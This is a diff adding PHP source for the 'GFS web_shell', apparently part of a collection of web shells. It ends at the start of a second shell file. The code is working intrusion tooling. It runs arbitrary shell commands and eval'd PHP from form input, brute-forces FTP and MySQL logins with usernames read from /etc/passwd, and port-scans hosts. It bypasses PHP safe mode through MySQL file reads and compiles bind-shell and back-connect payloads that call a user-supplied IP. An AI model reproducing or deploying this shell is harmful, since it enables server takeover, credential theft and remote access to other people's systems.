+function safe_mode_fuck($fil,$host, $username, $pass, $dbname)//Îáõîä áåçîïàñíîãî ğåæèìà
+{
+ $connect=mysql_connect($host,$username,$pass);
+ if($connect){
+  if(mysql_select_db($dbname,$connect)){
+   $c="DROP TABLE IF EXISTS temp_gfs_table;";
+   mysql_query($c);
+   $c="CREATE TABLE `temp_gfs_table` ( `file` LONGBLOB NOT NULL );";
+   mysql_query($c);
+   $c="LOAD DATA INFILE \"".$fil."\" INTO TABLE temp_gfs_table;";
+   mysql_query($c);
+   $c="SELECT * FROM temp_gfs_table;";
+   $r=mysql_query($c);
+   while(($row=mysql_fetch_array($r))){
+    $res.=htmlspecialchars($row[0]);
+   }
+   $c="DROP TABLE IF EXISTS temp_gfs_table;";
+   mysql_query($c);
+   }else
+    $res= "Can't select database";
+  mysql_close($db);
+  }else
+   $res="Can't connect to mysql server";
+ return $res;
+}
+function portscan($host)
+{
+ global $port;
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center>Host:  </td><td alling=center><b><font color=green> ".$host." </b></font></td></tr>";
+ for($i=1; $i<=65535; $i++){
+  $fp=fsockopen($host, $i, $errno, $errstr, 4);
+  if($fp){
+   fclose($fp);
+   if(isset($port[$i])){
+    $k=$port[$i];
+   }else
+    $k=getservbyport($i, "TCP");
+   if($k==""){$k="N\A";}
+   echo "<tr><td alling=center>Port: ".$i." </td><td alling=center><b><font color=green>".$k."</b></font></td>";
+   echo "</tr>";
+  }
+ }
+ echo "</table>";
+}
+function pwd_conwert()
+{
+ $res="";
+ if(file_exists("/etc/passwd")){
+  $input=implode(file("/etc/passwd"));
+  $input=explode("\n", $input);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ";
+  }
+  $res=explode(" ",$res);
+ }else{
+  $input=implode(ex("cat /etc/passwd"));
+  $input=explode("\n", $input);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ";
+  }
+  $res=explode(" ",$res);
+ }
+ return $res;
+}
+function brute($type,$type2,$host,$file)
+{
+ if($type2=="login:login"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, $v)){
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,$v);
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:empty"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, "")){
+      echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,"");
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:number"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     for($j=0; $j<=999; $j++){
+      if (ftp_login($conn_id, $v, "$j")){
+       echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      ftp_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     for($j=0; $j<=999; $j++){
+      $conn_id=mysql_connect($host,$v,"$j");
+      if($conn_id){
+        echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+       }
+       mysql_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:nigol"){
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=ftp_connect($host);
+     if(!$conn_id){ die("Coud not connect");}
+     if (ftp_login($conn_id, $v, strrev($v))){
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     ftp_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     $conn_id=mysql_connect($host,$v,strrev($v));
+     if($conn_id){
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }else
+      echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>";
+     mysql_close($conn_id);
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="login:lib"){
+  $input=file($file);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ".$word[1]." ";
+  }
+  $lib=explode(" ",$res);
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     foreach($lib as $kk=>$vv){
+      $conn_id=ftp_connect($host);
+      if(!$conn_id){ die("Coud not connect");}
+      if (ftp_login($conn_id, $v, $lib[$kk])){
+       echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      ftp_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $mass=pwd_conwert();
+   foreach($mass as $i=>$v){
+    if($v!=""){
+     foreach($lib as $kk=>$vv){
+      $conn_id=mysql_connect($host,$v,$lib[$kk]);
+      if($conn_id){
+       echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+      }
+      mysql_close($conn_id);
+     }
+    }
+   }
+   echo "</table>";
+  }
+ }elseif($type2=="lib:lib"){
+  $input=file($file);
+  foreach($input as $i=>$v){
+   $word=explode(":",$v);
+   $res.=$word[0]." ".$word[1]." ";
+  }
+  $lib=explode(" ",$res);
+  if($type=="ftp"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteFTP:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $count_lib=count($lib);
+   for($kk=0; $kk<$count_lib; $kk=$kk+2){
+    $conn_id=ftp_connect($host);
+    if(!$conn_id){ die("Coud not connect");}
+    if (ftp_login($conn_id,$lib[$kk],$lib[$kk+1])){
+     echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+    }
+    ftp_close($conn_id);
+   }
+   echo "</table>";
+  }elseif($type=="mysql"){
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center>BruteMySQL:  </td><td alling=center><b><font color=green> localhost </b></font></td></tr>";
+   $count_lib=count($lib);
+   for($kk=0; $kk<$count_lib; $kk=$kk+2){
+    if($lib[$kk]!=""){
+     $conn_id=mysql_connect($host,$lib[$kk],$lib[$kk+1]);
+     if($conn_id){
+      echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>";
+     }
+     mysql_close($conn_id);
+    }
+   }
+  echo "</table>";
+  }
+ }
+}
+
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////////// ÊÎÄ //////////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+echo $HTML;
+echo "<font  face=Verdana size=2 color=blue><b>";
+echo (rep_char("&nbsp;",15));
+echo "GFS web_shell ver 3.1.7 </b></font>";
+echo "<hr size=3 color=black>";
+sysinfo();
+echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+echo "<table BORDER=1 align=center>";
+if($r_act=="nav" OR $r_act==NULL){
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
+}else
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio name=\"r_act\" value=\"nav\"><b>Navigation</b></td>";
+if(!$safe_mode){
+ if($r_act=="bind"){
+  echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
+ }else
+  echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"bind\"><b>BindPort</b></td>";
+}
+
+if(function_exists(fsockopen)){
+ if($r_act=="port"){
+  echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"port\"><b>PortScan</b></td>";
+ }else
+  echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"port\"><b>PortScan</b></td>";
+}
+if($r_act=="brute"){
+ echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"brute\"><b>Brute</b></td>";
+}else
+ echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"brute\"><b>Brute</b></td>";
+if($r_act=="eval"){
+ echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"eval\"><b>Eval</b></td>";
+}else
+ echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"eval\"><b>Eval</b></td>";
+echo "<td><input type=submit name=\"b_act\" value=\"Change\"></td></tr></table></form>";
+################## ACTION ######################################################
+if($r_act=="nav" OR $r_act==NULL){
+ $box=$_POST['box'];
+ if($_POST['b_save']){
+  $res=save_file($_POST['text'],$_POST['fname'],$_POST['dname']);
+ }elseif($_POST['b_new_file']){
+  open_file($_POST['new'],"wb",$_POST['dname']);
+ }elseif($_POST['b_open_file']){
+  open_file($_POST['fname'],"r",$_POST['dname']);
+ }elseif($_POST['b_mail']){
+  $res="Function under construction!!!!!!!!!";
+ }elseif($_POST['b_run']){
+  chdir($_POST['wdir']);
+  $dir=getcwd();
+  $res=ex($_POST['cmd']);
+ }elseif($_POST['b_f_file']){
+  chdir($_POST['wdir']);
+  $dir=getcwd();
+  $res=ex("whereis ".$_POST['ffile']);
+ }elseif($_POST['b_upload']){
+  $s="Uploading file ".$_POST['lfilename']." use the ".$box;
+  $res=up_file($_POST['lfilename'],$_POST['tfilename'],$_POST['box']);
+ }elseif($_POST['b_mydb']){                              //Âûâîäèì ñïèñîê ÁÄ
+  $s="show_exists_db";
+  $res=db_show($_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif ($_POST['b_runsql']){                           //Âûïîëíÿåì SQL çàïğîñ
+  $s="SQL: ".$sql;
+  $res=run_sql($_POST['sql'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif($_POST['b_base']){                              //Âûâîäèì ñïèñîê òàáëèö
+  $s="show_exists_tables";
+  $res=show_tables($_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }elseif($_POST['b_table']){                             //Âûâîäèì äàìï òàáëèöû
+  $s="Dump of ".$_POST['tablename'];
+  $tablename=$_POST['tablename'];
+  if ($tablename!=""){
+   $res=dump_table($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  }else
+   $res="Select table!";
+ }elseif($_POST['b_safe_fuck']){                        //Îáõîä áåçîïàñíîãî ğåæèìà
+  $s="Open file ".$sfilename." with MySQL:";
+  $res=safe_mode_fuck($_POST['sfilename'],$_POST['host'], $_POST['username'], $_POST['pass'], $_POST['dbname']);
+ }elseif($_POST['b_dfilename']){                        //Îáõîä áåçîïàñíîãî ğåæèìà
+  $s="Dump in ".$dfilename." from ".$_POST['tablename'].":";
+  $res=run_sql("SELECT * INTO OUTFILE '".addslashes($_POST['dfilename'])."' FROM ".$_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ }
+ if ($host=="") {$host="localhost";}
+ if(isset($res)){
+  echo "<table BORDER=1 align=center>";
+  echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+  echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+  echo $res;
+  echo "</textarea></td></tr></table>";
+ }
+################## EXECUTE #####################################################
+ if(!$safe_mode){
+  $dir=getcwd();
+  echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+  echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+  echo "<table BORDER=1 align=center>";
+  echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Run command: </b></td></tr><font size=-2>";
+  echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"\" name=\"cmd\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Run\" name=\"b_run\"></td></tr>";
+  echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"$dir\" name=\"wdir\"></td>";
+  echo "</tr></table></form>";
+ }
+ echo "<hr size=3 color=black>";
+#################### UPLOAD ####################################################
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Upload files: </b></td></tr><font size=-2>";
+ if ($box==""){ $box="fopen";}
+ echo ("<tr><td alling=\"center\"><b>Use/from: </b><SELECT name=\"box\">");
+ echo("<OPTION>$box</option>");
+ echo("<OPTION value=\"PC\">PC</option>
+       <option value=\"WGET\">WGET</option><option value=\"FETCH\">
+       FETCH</option><option value=\"LYNX\">LYNX</option>
+       <option value=\"cURL\">cURL</option>
+       <option value=\"fopen\">fopen</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b>File: </b><input type=\"text\" name=\"lfilename\" size=50></td></tr>";
+ echo "<tr><td alling=\"center\"><b>Target: </b><input type=\"text\" name=\"tfilename\"
+      size=30  value=\"$tfilename\"></td></tr>";
+ echo "<tr><td alling=\"center\"><input type=\"submit\" name=\"b_upload\" value=\"UPLOAD\"></td></tr></table></form></font></font>";
+ echo "<hr size=3 color=black>";
+##################### MySQL ####################################################
+ if(isset($_POST['host'])){
+  $host=$_POST['host'];
+ }
+ if(isset($_POST['dbname'])){
+  $dbname=$_POST['dbname'];
+ }
+ if(isset($_POST['tablename'])){
+  $tablename=$_POST['tablename'];
+ }
+ if(isset($_POST['sql'])){
+  $sql=$_POST['sql'];
+ }
+ if(isset($_POST['sfilename'])){
+  $filename=$_POST['sfilename'];
+ }
+ if(isset($_POST['dfilename'])){
+  $dfilename=$_POST['dfilename'];
+ }
+ if(isset($_POST['username'])){
+  $username=$_POST['username'];
+ }
+ if(isset($_POST['pass'])){
+  $pass=$_POST['pass'];
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>MySQL DB connect: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><b>Host name:</b></td>";
+ echo "<td alling=\"center\"><b>DB name:</b></td>";
+ echo "<td alling=\"center\"><b>Table name:</b></td>";
+ echo "<td alling=\"center\"><b>SQL command: </b></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"host\" value=\"$host\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"dbname\" value=\"$dbname\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"tablename\" value=\"$tablename\"></td>");
+ echo ("<td alling=\"center\"><input type=\"text\" name=\"sql\" value=\"$sql\"></td></tr>");
+ echo "<tr><td alling=\"center\"><b>User name:</b></tb>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_base\" value=\"Dump DB\"></td>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_table\" value=\"Dump table\"></td>";
+ echo "<td alling=\"center\"><input type=\"submit\" name=\"b_runsql\" value=\"Run SQL\"></tb></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"username\" value=\"$username\"></td><td alling=\"center\"></td><td alling=\"center\"><input type=\"submit\" name=\"b_dtable\" value=\"Download\"></td></tr>");
+ echo "<tr><td alling=\"center\"><b>Pass: </b></td>";
+ if ($safe_mode){
+  echo "<td alling=\"center\"><b>OpenFilename: </b></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>";
+ }else
+  echo "<td alling=\"center\"></td><td alling=\"center\"><b>DumpFilename: </b></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"text\" name=\"pass\" value=\"$pass\"></td>");
+ if ($safe_mode){
+  echo "<td alling=\"center\"><input type=\"text\" name=\"sfilename\" value=\"$filename\"></td><td alling=\"center\"><input type=\"text\" name=\"b_dfilename\" value=\"$dfilename\"></td></tr>";
+ }else
+  echo "<td alling=\"center\"></td><td alling=\"center\"><input type=\"text\" name=\"dfilename\" value=\"$dfilename\"></td></tr>";
+ echo ("<tr><td alling=\"center\"><input type=\"submit\" name=\"b_mydb\" value=\"Show exists DB\"></td>");
+ if ($safe_mode){
+  echo ("<td alling=\"center\"><input type=\"submit\" name=\"b_safe_fuck\" value=\"SafeMode FileOpen\"></td>");
+ }else
+  echo "<td alling=\"center\"></td>";
+ echo("<td alling=\"center\"><input type=\"submit\" name=\"b_dfilename\" value=\"Dump table\"></td>");
+ echo "</tr></table></font></font>";
+ echo "<hr size=3 color=black>";
+################## NAVIGATION ##################################################
+ list_dir();
+}
+##################### PortScan #################################################
+if($r_act=="port"){
+ if($_POST['host']==""){
+  $host="localhost";
+ }else
+  $host=$_POST['host'];
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Scan host: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$host."\" name=\"host\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Scan\" name=\"b_scan\"></td></tr>";
+ echo "</tr></table></form>";
+ if($_POST['b_scan']){
+  portscan($host);
+ }
+}
+##################### PortBind #################################################
+if($r_act=="bind"){
+ if($_POST['b_bind']){
+  if($_POST['box']=="C++"){
+   save_file(base64_decode($port_c),"/var/tmp/gfs.c",getcwd());
+   ex("gcc /var/tmp/gfs.c");
+   unlink("/var/tmp/gfs.c");
+   ex("/var/tmp/a.out ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo ex("ps -aux | grep a.out");
+   echo "</textarea></td></tr></table>";
+  }
+  if($_POST['box']=="Perl"){
+   save_file(base64_decode($port_pl),"/var/tmp/gfs.pl",getcwd());
+   ex("perl /var/tmp/gfs.pl ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo ex("ps -aux | grep gfs.pl");
+   echo "</textarea></td></tr></table>";
+  }
+ }
+ if($_POST['b_connect']){
+  if($_POST['box']=="C++"){
+   save_file(base64_decode($back_connect_c),"/var/tmp/gfs.c",getcwd());
+   ex("gcc -o /var/tmp/gfs.c /var/tmp/gfs");
+   unlink("/var/tmp/gfs.c");
+   ex("/var/tmp/gfs ".$_POST['ip']." ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...";
+   echo "</textarea></td></tr></table>";
+  }
+  if($_POST['box']=="Perl"){
+   save_file(base64_decode($back_connect_pl),"/var/tmp/gfs.pl",getcwd());
+   ex("perl /var/tmp/gfs.pl ".$_POST['ip']." ".$_POST['port']." &");
+   echo "<table BORDER=1 align=center>";
+   echo "<tr><td alling=center><b>".$s."</b></td></tr>";
+   echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+   echo "Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...";
+   echo "</textarea></td></tr></table>";
+  }
+ }
+ if($_POST['b_proxy']){
+  save_file(stripslashes(base64_decode($prx1).$_POST['port'].base64_decode($prx2)),"/var/tmp/gfs.pl",getcwd());
+  ex("perl /var/tmp/gfs.pl");
+  echo "<table BORDER=1 align=center>";
+  echo "<tr><td alling=center><b>Proxy</b></td></tr>";
+  echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+  echo ex("ps -aux | grep gfs.pl");
+  echo "</textarea></td></tr></table>";
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Bind Port: </b></td></tr><font size=-2>";
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"C++\">C++</option>
+       <option value=\"Perl\">Perl</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>BindPort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Bind\" name=\"b_bind\"></td></tr>";
+ echo "</tr></table></form>";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Back connect: </b></td></tr><font size=-2>";
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"C++\">C++</option>
+       <option value=\"Perl\">Perl</option></select></td></tr>");
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>RemotePort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"26660\" name=\"port\"></td></tr>";
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>RemoteIp: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"".$REMOTE_ADDR."\" name=\"ip\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Connect\" name=\"b_connect\"></td></tr>";
+ echo "</tr></table></form>";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>HTTPProxy: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><b><font  face=Verdana size=2>ProxyPort: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"46660\" name=\"port\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Create\" name=\"b_proxy\"></td></tr>";
+ echo "</tr></table></form>";
+}
+##################### Brute ####################################################
+if($r_act=="brute"){
+ if(isset($_POST['brute_host'])){
+  $host=$_POST['brute_host'];
+ }else
+  $host="localhost";
+ if(isset($_POST['lib'])){
+  $lib=$_POST['lib'];
+ }else
+  $lib="  [library]";
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Brute: </b></td></tr><font size=-2>";
+ echo "<tr bgcolor=#00ff00><td alling=\"center\"><b>Example lib: </b>login:pass</td></tr>";
+ echo ("<tr><td alling=\"center\"><b>Bryte type: </b><SELECT name=\"box1\">");
+ echo("<option value=\"login:login\">login:login</option>
+       <option value=\"login:nigol\">login:nigol</option>
+       <option value=\"login:empty\">login:empty</option>
+       <option value=\"login:number\">login:number</option>");
+ if(function_exists(fopen)){
+  echo "<option value=\"login:lib\">login:lib</option>";
+  echo "<option value=\"lib:lib\">lib:lib</option>";
+ }
+ echo ("</select></td></tr>");
+ echo ("<tr><td alling=\"center\"><b>Use: </b><SELECT name=\"box\">");
+ echo("<OPTION value=\"mysql\">mysql</option>
+       <option value=\"ftp\">ftp</option>");
+// if(function_exists(ssh2_connect)){
+//  echo "<option value=\"ssh\">ssh</option>";
+// }
+ echo ("</select></td>");
+ echo("<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Brute\" name=\"b_brute\"></td></tr><tr><td alling=\"center\"><b>Host: </b><input type=\"text\" name=\"brute_host\" value=\"".$host."\">(for lib:lib)</td></tr>");
+ if(function_exists(fopen)){
+  echo "<td alling=\"center\"><b>From lib (if set): <input type=\"text\" name=\"lib\" value=\"".$lib."\">";
+ }
+ echo ("</table></form>");
+ if($_POST['b_brute']){
+  brute($_POST['box'],$_POST['box1'],$_POST['brute_host'],$_POST['lib']);
+ }
+}
+#################### Eval ######################################################
+if($r_act=="eval"){
+ if($_POST['b_eval']){
+  $eval=str_replace("<?","",$_POST['php_eval']);
+  $eval=str_replace("?>","",$eval);
+  eval($eval);
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font  face=Verdana size=2>Eval php: </b></td></tr><font size=-2>";
+ echo "<tr><td alling=\"center\"><textarea name=\"php_eval\" cols=90 rows=15></textarea></td></tr><tr><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Eval\" name=\"b_eval\"></td></tr>";
+ echo "</tr></table></form>";
+}
+
+echo "<hr size=3 color=black>";
+echo "<font  face=Verdana size=2 color=blue><b>";
+echo (rep_char("&nbsp",15));
+echo "(c) GFS</font>";
+echo (rep_char("&nbsp",15));
+echo "<a href=\"http://www.gfs-team.ru\">www.gfs-team.ru</a>";
+echo "<hr size=3 color=black>";
+?>
diff --git a/138shell/G/gfs_sh.txt b/138shell/G/gfs_sh.txt
new file mode 100644
index 0000000..dd6c601
--- /dev/null
+++ b/138shell/G/gfs_sh.txt
@@ -0,0 +1,1575 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
